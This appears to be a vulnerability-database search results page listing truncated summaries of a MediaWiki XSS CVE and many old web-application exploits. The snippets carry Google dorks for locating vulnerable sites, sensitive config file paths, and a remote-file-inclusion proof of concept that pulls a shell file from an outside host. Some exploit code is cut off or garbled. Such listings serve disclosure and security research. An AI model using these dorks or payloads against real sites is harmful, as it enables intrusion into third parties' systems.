17 matches found
CVE-2021-42043
An issue was discovered in Special:MediaSearch in the MediaSearch extension in MediaWiki through 1.36.2. The suggestion text, a parameter to mediasearch-did-you-mean, was not being properly sanitized and allowed for the injection and execution of HTML and JavaScript via the intitle: search operator...
PT-2021-23482 · Mediawiki +2
Name of the Vulnerable Software and Affected Versions: MediaWiki versions through 1.36.2; MediaSearch extension versions through 1.36.2. Description: An issue was discovered in Special:MediaSearch in the MediaSearch extension. The suggestion text, a parameter to mediasearch-did-you-mean, was not...
jax formmailer 3.0.0 - Remote File Inclusion Vulnerability
No description provided by source. Remote file include. Script: Jax FormMailer 3.0.0 Release: 01.06.2008 - Author: ahmadbady download...
X7 Chat 2.0.5.1 - Cross-Site Request Forgery (Add Admin)
Exploit Title: X7 Chat 2.0.5.1 CSRF Add Admin Exploit Google Dork: intitle:"Chat Room" "Powered By X7 Chat 2.0.5" Date: 09.05.2012 Author: DennSpec Software Link: http://x7chat.com/releases/v2/x7chat2051.zip Version: Replace http://xxxxxxxxx.com/x7path/ to your target url. Don't forget replace...
aspcms Station system injection 0day-vulnerability warning-the black bar safety net
aspcms is a newly developed open-source enterprise site-building system that can meet a variety of enterprise site requirements and supports template customization and extensions, so an enterprise site can be completed in a short time. Vulnerable file: /plug/productbuy...
WESPA PHP Newsletter 3.0 Administrator Password Change
"WESPA PHP Newsletter v3.0" Remote Admin Password Change With install path Author: alieye class : remote E-mail: [email protected] greetz: C.S.Eye Security Team members We Are: Alieye , Z0d14c , Bully13 , Stanly , Safety & All Iranian Hackers Site : www.gcmt.vcp.ir , blog : www.cseye.blogfa.com...
phpBazar Administrative Disclosure
phpBazar admin path disclosure Vulnerability. Author :: NetSpy Group :: Aras cyber Army Email :: [email protected] Discover :: 1 july 2010 Critical Lvl :: M Published :: 22 june 2010 vendor :: n/a...
VRNews 1.1.1 - admin.php Remote Security Bypass
VRNews 1.1.1 - admin.php Remote Security Bypass VRNews v1.x = /VRNews/admin.php Permission Found by: R4M! - [email protected] Dork: intitle:"vrnews v1" Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm Example: 1. /VRNews/admin.php?act=edit 2. /VRNews/admin.php?act=add 3...
jGallery 1.3 - 'index.php' Remote File Inclusion
Y! Underground Team...
bj-xss.txt
BJ Webring XSS By : sn0oPy Risk : high exploit : just inject any script on the add link menu : http://www.target.ma/webring/formulaire.php Dork : intitle:".: index webring :." contact : [email protected] greetz : subzero, http://forums.avenir-geopolitique.net. reference :...
Ezboo webstats access to sensitive files
Ezboo webstats access to sensitive files By : sn0oPy Risk : medium site : http://www.ezboo.com/softs exploit : just add this files to the url : http://www.target.ma/ezwebstats/update.php http://www.target.ma/ezwebstats/config.php Dork : inurl:"/ezWebStats/" intitle:"ezBOO WebStats" contact :...
Cacti <= 0.8.6i cmd.php popen() Remote Injection Exploit
Exploit for unknown platform in category web applications ======================================================== Cacti 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".deche...
PHPGraphy 0.9.12 Privilege Escalation / Commands Execution Exploit
No description provided by source. ?php printr' --------------------------------------------------------------------------- PHPGraphy 0.9.12 ZendHashDelKeyOrIndex/privilege escalation/ /remote command execution exploit by rgod dork: intext:"This site is using phpGraphy" | intitle:"my phpgraphy...
Google advanced techniques—GooGle Hack-vulnerability warning-the black bar safety net
Google hacking is actually not anything new; at the time I did not pay attention to this technology, thinking of webshells or something, and without too much practical use. Google hacking is not so simple... Commonly used Google keyword: foo1 foo2 which is associated, such as search xx company xx beauty...
Tagger v3 <= BBCodeFile Remote file inclusion
Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dork: intitle:"Tagger LE" inurl:tags.php Visit us :...
iGENUS WebMail 2.0.2 - config_inc.php Remote Code Execution
iGENUS WebMail 2.0.2 - config_inc.php Remote Code Execution #!/usr/bin/perl use IO::Socket; print "\r\n"; print "iGENUS WebMail works against PHP5 with register_globals = On\r\n"; print " & allow_url_fopen = On\r\n"; print "by rgod rgodautisticiorg\r\n"; print "site:...